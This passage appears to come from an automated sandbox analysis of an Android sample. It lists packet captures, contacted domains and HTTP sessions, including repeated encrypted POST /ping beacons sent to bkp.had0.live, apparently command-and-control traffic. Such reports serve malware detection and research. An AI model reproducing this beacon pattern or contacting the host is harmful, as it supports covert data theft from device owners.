Sep 28, 2023 14:36:00.061846018 CEST	32904	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:36:00.061903954 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:36:00.061959982 CEST	32904	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:36:00.068114996 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:36:00.068268061 CEST	32904	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:36:00.068325043 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:36:00.074767113 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:36:00.080492020 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:36:00.080595970 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:36:00.081691027 CEST	32904	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:36:00.081752062 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:36:00.082391977 CEST	32904	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:36:00.086080074 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:36:00.092161894 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:36:00.092268944 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:36:00.097898960 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:36:00.097986937 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:36:00.098910093 CEST	32904	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:36:00.098970890 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:36:00.099025011 CEST	32904	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:36:00.104146004 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:36:00.110321999 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:36:00.110424995 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:36:00.112612009 CEST	32904	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:36:00.112672091 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:36:00.112782955 CEST	32904	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:36:00.115681887 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:36:00.115916014 CEST	32904	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:36:00.115972996 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:36:00.116066933 CEST	32904	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:36:00.130783081 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:36:00.133651018 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:36:00.133768082 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:36:00.139600992 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:36:00.139714956 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:36:00.142395020 CEST	32904	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:36:00.142456055 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:36:00.142537117 CEST	32904	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:36:00.145422935 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:36:00.151460886 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:36:00.151575089 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:36:00.157382965 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:36:00.157497883 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:36:00.157560110 CEST	32904	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:36:00.157622099 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:36:00.157665014 CEST	32904	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:36:00.157728910 CEST	32904	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:36:00.162831068 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:36:00.162985086 CEST	32904	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:36:00.163042068 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:36:00.163361073 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:36:00.163537979 CEST	32904	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:36:00.163865089 CEST	32904	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:36:00.163904905 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:36:00.163964033 CEST	32904	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:36:01.847558975 CEST	33850	80	192.168.2.30	135.181.49.35
Sep 28, 2023 14:36:01.847565889 CEST	33844	80	192.168.2.30	135.181.49.35
Sep 28, 2023 14:36:02.049657106 CEST	80	33850	135.181.49.35	192.168.2.30
Sep 28, 2023 14:36:02.049886942 CEST	33850	80	192.168.2.30	135.181.49.35

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 28, 2023 14:35:14.532672882 CEST	68	67	192.168.2.30	192.168.2.1
Sep 28, 2023 14:35:14.533222914 CEST	67	68	192.168.2.1	192.168.2.30

HTTP Request Dependency Graph

play.googleapis.com

clientservices.googleapis.com

t.me

www.googleapis.com

android.apis.google.com

android.googleapis.com

bkp.had0.live

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.30	60630	142.251.41.10	443

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.30	46744	142.250.65.195	443

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.2.30	52096	149.154.167.99	443

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
3	192.168.2.30	32896	142.250.65.170	443

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
4	192.168.2.30	32898	142.250.65.170	443

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
5	192.168.2.30	39584	142.251.32.110	443

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
6	192.168.2.30	40806	142.250.80.106	443

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
7	192.168.2.30	32904	142.250.65.170	443

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
8	192.168.2.30	33844	135.181.49.35	80

Timestamp	kBytes transferred	Direction	Data
Sep 28, 2023 14:34:04.662177086 CEST	63	OUT	POST /ping HTTP/1.1 Content-Type: application/json; charset=UTF-8 Content-Length: 4343 Host: bkp.had0.live Connection: Keep-Alive Accept-Encoding: gzip User-Agent: okhttp/4.2.1 Data Raw: 7b 22 68 61 73 68 22 3a 22 54 4c 4e 37 48 70 64 70 58 33 2b 65 6f 68 42 4b 41 4e 74 7a 73 67 4c 67 4b 43 77 69 73 33 4c 58 57 53 4a 4a 48 44 65 79 6b 30 34 3d 22 2c 22 69 64 22 3a 22 41 4d 4b 48 62 66 55 55 56 70 59 77 4c 41 78 2b 31 37 56 55 74 55 39 52 47 32 73 57 52 71 57 45 61 54 53 7a 79 32 49 31 76 32 6e 59 70 51 4a 72 34 5a 70 54 56 76 79 78 6c 2f 4a 4a 5a 58 36 6f 6d 67 4c 4c 2f 48 45 63 74 64 68 2f 71 47 44 6a 4a 44 61 4d 39 2b 6a 51 35 77 69 67 48 54 58 45 41 42 44 71 5a 6a 68 37 2f 79 4c 32 37 56 38 45 76 50 46 6e 52 32 52 4e 78 52 4a 6d 4f 42 73 46 63 4e 6a 44 78 4e 58 71 5a 37 65 33 76 48 49 2b 4b 4e 6c 68 31 2f 59 36 64 46 6f 53 75 4a 53 49 78 5a 58 55 37 39 62 30 50 68 31 6f 77 65 48 35 76 41 48 65 54 53 79 58 64 4a 43 58 2b 5a 6e 4d 61 4b 6f 70 76 58 6e 46 71 2b 46 32 4a 73 37 78 59 61 64 7a 43 36 68 53 44 76 7a 6f 6f 50 65 58 57 64 6d 42 4c 61 47 47 2b 44 46 77 73 76 47 45 4e 68 67 44 73 64 30 57 4c 61 62 31 66 2f 76 72 64 58 76 39 78 45 52 45 6e 42 63 47 6e 63 64 75 59 2f 36 31 4f 54 63 67 4b 33 59 43 59 57 2f 4a 61 49 6f 49 39 76 34 69 66 72 30 73 4f 2f 72 63 4c 59 32 69 61 38 73 52 43 76 71 52 4a 45 66 5a 45 76 58 36 7a 4d 67 53 42 38 55 36 73 76 36 70 2b 43 57 7a 58 6a 2b 52 32 62 69 54 4a 58 6d 33 33 47 44 39 39 68 4f 79 56 7a 6c 4e 66 50 43 53 44 55 57 78 51 46 41 4d 53 72 6e 48 34 34 41 34 63 4d 45 77 30 6c 64 4d 4f 50 42 79 6a 2b 6b 49 34 2f 43 6a 54 4c 58 63 6d 44 69 59 38 61 66 4d 53 4e 47 76 4b 6f 6e 6e 55 61 65 65 44 50 48 55 4f 33 56 72 4f 61 66 2f 61 6c 6c 37 30 58 61 61 4f 45 43 72 6e 34 4f 52 39 77 67 66 34 39 32 6a 4c 43 62 68 41 4a 6c 4e 77 56 59 67 2f 6c 75 38 71 43 38 75 67 55 58 4a 31 43 35 36 66 70 6e 43 61 72 4f 45 45 72 74 57 39 6d 61 30 4e 6d 6d 56 36 58 54 4d 4e 49 31 6a 75 73 32 7a 64 2b 43 44 53 67 4f 30 4f 52 59 34 57 58 63 77 6f 6e 31 59 76 6f 63 36 47 6c 7a 7a 6b 7a 4a 6e 31 4a 57 56 52 78 59 62 47 73 2f 31 68 4a 32 56 79 58 49 49 35 50 6c 66 39 30 31 36 2b 41 79 55 4d 7a 67 67 41 61 63 49 54 6f 75 41 78 4e 45 37 55 67 65 4f 52 53 70 72 69 4d 7a 75 4f 43 6b 75 7a 47 51 6a 76 71 43 64 47 7a 62 43 74 61 4b 37 6c 46 6f 45 53 79 62 6b 53 75 35 55 63 6e 45 45 46 37 4b 6a 36 5a 65 38 43 35 67 2b 50 7a 4c 38 6a 45 64 58 38 57 33 6b 56 69 30 72 6f 30 71 38 78 6c 51 33 54 34 36 46 38 53 4e 57 6d 56 31 38 73 70 4e 46 38 5a 2f 4c 71 47 78 7a 53 31 70 78 6e 31 6f 64 6b 68 32 72 76 47 32 52 30 6b 6d 49 68 58 67 6d 6d 5a 46 4e 77 62 58 51 54 6f 72 47 33 68 53 71 70 69 76 47 38 48 62 4b 37 72 71 34 6a 6e 77 6a 34 78 4e 68 61 73 6d 36 70 74 58 58 51 79 6d 6b 6b 68 58 50 41 59 59 2b 55 4e 70 58 39 66 43 70 50 76 32 6b 36 58 6b 75 38 72 44 73 2f 74 47 44 51 70 79 68 46 43 54 6d 75 71 42 6b 35 34 71 74 58 41 4b 6f 6b 52 5a 2b 65 4e 56 69 64 34 77 4f 78 78 70 7a 4d 58 46 7a 2b 45 56 4e 62 41 4c 68 6d 47 73 66 4d 59 6b 6e 44 63 6e 2b 4a 6e 54 71 44 46 56 37 4d 57 36 7a 37 76 4a 70 67 52 6d 6d 73 46 72 6e 35 72 42 61 30 67 4e 4f 59 64 38 43 4d 43 42 50 52 66 65 4c 68 42 32 61 4c 56 37 52 56 49 67 38 4a 4d 2b 54 7a 66 55 32 38 74 73 75 6c 2f 69 30 48 6c 67 4e 49 31 4f 6b 35 36 44 30 6f 34 78 39 68 5a 55 6f 53 34 62 70 53 7a 46 70 45 72 32 44 36 66 71 53 70 49 6c 6e 66 56 6f 73 66 6d 52 75 47 71 45 38 47 4a 50 44 65 76 6a 77 33 78 70 77 31 64 37 68 58 79 35 34 78 6b 49 42 4a 4c 49 31 47 49 61 67 56 71 79 2b 57 57 4a 72 56 41 34 4b 69 66 74 51 70 35 6c 50 52 52 78 79 6c 48 75 45 56 64 32 45 4d 6c 55 47 42 74 4a 6c 78 5a 6c 2b 44 42 57 73 58 38 56 73 79 74 2f 39 33 6f 30 67 72 47 39 51 53 59 56 4d 76 6f 50 4c 30 42 38 72 79 5a 61 58 56 4a 68 36 58 4a 52 77 6f 52 47 75 30 70 36 50 74 77 44 6c 42 76 72 59 4d 75 58 54 6f 5a 2f 73 74 78 71 37 46 48 50 43 37 38 72 4a 4f 48 41 4b 70 31 39 55 6a 71 41 67 42 33 4b 62 45 4d 61 6a 79 46 58 2b 45 69 37 58 59 79 66 68 4d 59 45 41 48 2f 51 55 4a 6b 75 6f 54 42 69 53 72 4a 4b 73 66 38 48 71 31 42 58 52 36 54 74 78 74 34 59 76 31 49 6e 49 72 31 70 4c 5a 6d 6d 2f 46 6d 68 4c 4e 4c 44 78 43 58 68 41 48 63 64 70 74 57 32 78 38 36 68 69 53 36 53 53 70 66 31 41 30 79 77 72 42 63 70 71 72 68 68 4e 30 45 33 5a 30 6f 4d 71 79 62 61 73 45 65 37 32 56 6a 6a 6b 76 48 Data Ascii: {"hash":"TLN7HpdpX3+eohBKANtzsgLgKCwis3LXWSJJHDeyk04=","id":"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
Sep 28, 2023 14:34:04.858225107 CEST	64	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 28 Sep 2023 12:34:04 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Last-Modified: Fri, 03 Mar 2023 18:07:28 GMT ETag: W/"592-5f602d176fbd2" Content-Encoding: gzip Data Raw: 32 64 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 54 6d 6f d3 30 10 fe be 5f 71 04 81 40 22 71 d3 8e 8d a6 69 a4 d1 6e 62 12 8c 89 15 01 1f bd e4 9a 78 4b ec 60 5f 5f c2 c4 7f c7 4e ba b6 d3 00 f1 01 57 aa 92 7b 79 9e e7 ce 77 89 9f 4c 3f 4e 66 df 2e 4f a1 a0 aa 84 cb cf 6f df 9f 4f c0 f3 19 fb 32 98 30 36 9d 4d e1 eb bb d9 87 f7 10 06 3d b8 22 2d 52 62 ec f4 c2 03 af 20 aa 23 c6 56 ab 55 b0 1a 04 4a e7 6c f6 89 ad 1d 4a e8 d2 36 8f be 69 73 82 8c 32 2f 39 88 5b 92 75 55 4a 33 fe 0d 40 38 1c 0e bb 3c cf 05 45 25 97 f9 d8 43 e9 c1 f6 29 89 0b e4 59 72 00 f6 c4 24 a8 c4 e4 b0 77 08 cf ab 8c 9b 62 04 17 8a e0 4c 2d 64 16 b3 ce d9 05 56 48 1c 1c 9f 8f df 17 62 39 f6 26 4a 12 4a f2 67 4d 8d 1e a4 dd db d8 23 5c 13 73 fc 23 48 0b ae 0d d2 f8 f3 ec cc 7f e3 b1 7d 20 c9 2b 1c 7b 19 9a 54 8b 9a 84 92 7b 08 57 4a eb e6 15 d4 3c 47 90 56 cc dc 89 d9 a6 1b 6a 4a 04 b2 a4 1b ae d4 18 af f3 b9 73 ad b2 06 ee e6 16 cb 37 e2 07 46 e1 61 bd b6 4a 54 a9 74 f4 f4 b8 3d 23 68 dd 73 5e 89 b2 89 b8 16 dc 6a 75 50 3e 2f 45 2e a3 d4 aa 40 3d fa b9 c5 2c c2 07 88 6f 7a 7b 90 c3 e1 c9 f1 c9 d9 08 2a ae 73 21 23 38 b6 4e e8 b9 df 3e 40 1f ee ba 78 78 3a 3d 3d 9a bc 9e 3e d4 00 1b 11 3b 12 e8 b7 24 ad 61 85 22 2f 28 b2 a5 95 d9 08 4a 24 ab ce 37 35 4f 85 cc 23 f0 43 17 78 4f ef 0f 5a fa c1 d0 1a 77 fc 35 dc ad 44 46 45 34 e8 60 1f 17 bb 01 f0 4b 9c 53 c4 17 a4 46 1b 83 6e b9 5b cb 7d 0c a9 3a 82 81 ab 73 c7 90 89 e5 7f e1 d8 21 f2 a8 14 f2 76 d7 b7 c1 e1 eb c1 d1 c9 83 80 a5 30 82 30 fb 6b 0c 4f 49 2c f1 af 21 85 5a a2 fe 43 44 cc da 79 b3 6b c7 ba a5 39 88 dd 84 6d 66 b1 4e 62 bb 13 1a e7 db 4d e4 59 25 64 80 6b 5e d5 25 06 a9 aa 98 97 3c b2 c5 8c 27 31 ab 37 20 45 e8 d6 cf e2 87 f7 86 7e 72 e9 66 7f 6f 11 ad a9 f3 d9 3e ef 66 fd 9c c0 20 56 06 a8 e0 64 ff b0 db 99 46 2d 60 85 da 2e 89 6e ec 88 00 29 d0 c8 d3 02 32 85 a6 dd 28 5c 0b 43 c0 65 53 29 8d af 40 69 7b 35 cd 35 82 20 28 b8 81 9b 85 f5 56 b6 2b 59 b0 e5 fa 66 41 53 2e c1 10 d7 36 35 e7 42 c2 5c ab aa a5 fd 97 2e 14 aa 42 57 b8 63 cb 15 5c f3 f4 d6 29 db a6 de f0 25 ef be 06 d1 b3 7e af b0 02 95 6e 82 5c bd f0 c3 97 5e 52 6b 5c 0a b5 30 6d 85 0e 26 d8 5c 4f db 90 98 75 97 12 b7 1f 9e e4 e0 17 63 2a 81 73 92 05 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 2d3Tmo0_q@"qinbxK`__NW{ywL?Nf.OoO206M="-Rb #VUJlJ6is2/9[uUJ3@8<E%C)Yr$wbL-dVHb9&JJgM#\s#H} +{T{WJ<GVjJs7FaJTt=#hs^juP>/E.@=,oz{s!#8N>@xx:==>;$a"/(J$75O#CxOZw5DFE4`KSFn[}:s!v00kOI,!ZCDyk9mfNbMY%dk^%<'17 E~rfo>f VdF-`.n)2(\CeS)@i{55 (V+YfAS.65B\.BWc\)%~n\^Rk\0m&\Oucs0
Sep 28, 2023 14:34:19.368801117 CEST	68	OUT	POST /ping HTTP/1.1 Content-Type: application/json; charset=UTF-8 Content-Length: 4343 Host: bkp.had0.live Connection: Keep-Alive Accept-Encoding: gzip User-Agent: okhttp/4.2.1 Data Raw: 7b 22 68 61 73 68 22 3a 22 54 4c 4e 37 48 70 64 70 58 33 2b 65 6f 68 42 4b 41 4e 74 7a 73 67 4c 67 4b 43 77 69 73 33 4c 58 57 53 4a 4a 48 44 65 79 6b 30 34 3d 22 2c 22 69 64 22 3a 22 67 2f 72 67 50 72 6a 6b 71 79 79 4f 63 6e 2b 55 74 30 65 52 4f 49 74 64 62 41 32 41 30 68 4b 35 65 38 34 64 48 6c 4f 54 68 53 78 70 42 7a 6e 51 45 52 48 55 34 65 68 35 35 38 4b 50 33 79 72 61 52 38 62 54 42 76 79 4d 6a 49 45 57 68 67 67 56 45 4b 46 45 49 5a 72 33 69 6d 6e 52 73 2b 5a 53 67 7a 45 41 4f 64 65 52 4a 4f 39 4b 32 70 63 32 52 72 31 55 58 47 31 36 4a 71 7a 38 43 6c 2f 67 64 36 76 35 54 49 4d 4d 73 6f 4f 7a 6c 71 59 4a 49 75 35 36 6b 48 72 76 69 79 46 38 76 5a 47 68 72 31 77 39 58 50 6c 64 52 49 5a 54 76 41 2b 58 54 71 6f 4d 39 70 43 76 77 42 42 6d 38 4b 63 57 45 7a 75 46 30 43 54 52 4a 74 69 74 54 35 30 62 42 55 67 79 44 75 73 6b 76 39 66 56 38 65 73 69 5a 62 6a 30 78 30 41 4e 50 4b 45 4e 52 30 41 79 73 4d 66 49 65 7a 74 4a 6c 5a 79 56 68 55 37 52 78 44 49 71 2f 4a 79 61 4e 4f 77 74 4c 4f 77 6c 63 71 38 34 6a 57 2b 53 59 53 55 45 56 43 38 7a 7a 6a 49 31 4b 72 63 6c 31 48 6d 47 32 65 41 78 67 36 57 63 4b 73 36 42 57 4f 34 72 50 39 54 6d 38 34 4d 78 61 39 59 48 32 36 6d 37 36 62 4c 31 57 52 49 58 6f 54 42 5a 76 5a 37 71 4a 64 73 64 32 59 73 38 52 57 30 57 30 74 4b 4c 32 77 33 6d 33 65 50 58 4b 41 58 43 4b 2b 6e 54 4e 55 75 42 46 30 6b 74 4d 49 37 78 57 41 47 6f 67 45 6f 6a 55 72 37 73 4a 50 69 43 35 4b 79 6e 72 65 4c 4d 71 77 49 4e 47 2b 49 7a 49 63 50 4b 41 75 71 42 57 33 74 6f 6e 4c 4c 47 56 66 50 4a 68 66 2b 79 4b 41 36 31 71 45 6a 7a 2f 65 4a 61 42 45 44 75 48 49 55 47 7a 38 44 5a 70 79 59 6b 61 2f 62 4c 72 43 56 59 30 47 66 6f 33 31 35 39 36 31 5a 2b 2f 51 51 59 48 51 43 4b 76 65 38 45 33 5a 68 38 38 53 57 42 4a 76 74 53 38 30 4a 4c 64 52 71 61 43 42 4c 6a 33 7a 4a 74 77 4e 64 4b 33 7a 67 6f 46 35 30 78 54 76 4e 41 47 79 6f 50 48 6a 39 79 76 50 64 67 45 45 6e 69 4b 32 48 36 45 31 65 53 76 6f 66 6c 75 55 77 44 6a 37 2f 37 6a 44 49 42 32 77 43 71 4a 42 63 36 76 33 4f 73 37 32 34 70 76 79 41 4a 75 58 66 63 6a 34 34 79 47 68 46 45 58 78 69 49 66 4a 66 49 45 58 35 7a 6f 50 37 46 73 71 4a 55 69 58 73 39 65 39 6e 63 6c 6f 32 6b 36 46 2b 4a 62 72 49 65 77 73 62 37 59 73 76 72 38 61 70 75 33 75 44 32 6f 4a 42 73 43 45 4d 54 70 4d 77 55 2f 79 43 61 63 67 4e 39 77 68 55 47 71 67 73 42 7a 74 4a 2f 2b 62 38 67 6c 56 58 77 42 6f 5a 56 6c 55 6d 72 36 66 37 73 31 38 55 59 59 2f 4e 62 68 31 61 62 5a 2f 42 4f 55 51 44 74 72 55 61 4e 48 2b 54 71 70 39 49 67 35 6d 48 65 62 38 68 6d 31 6d 2b 54 4b 71 33 35 38 4e 36 68 76 48 65 53 51 77 6c 58 47 74 2f 46 36 74 75 75 4e 61 4a 48 78 43 71 79 6d 65 37 64 53 72 49 78 4b 5a 77 35 68 33 7a 68 66 42 74 52 48 48 4d 48 4f 41 57 51 49 56 67 2b 48 77 65 4c 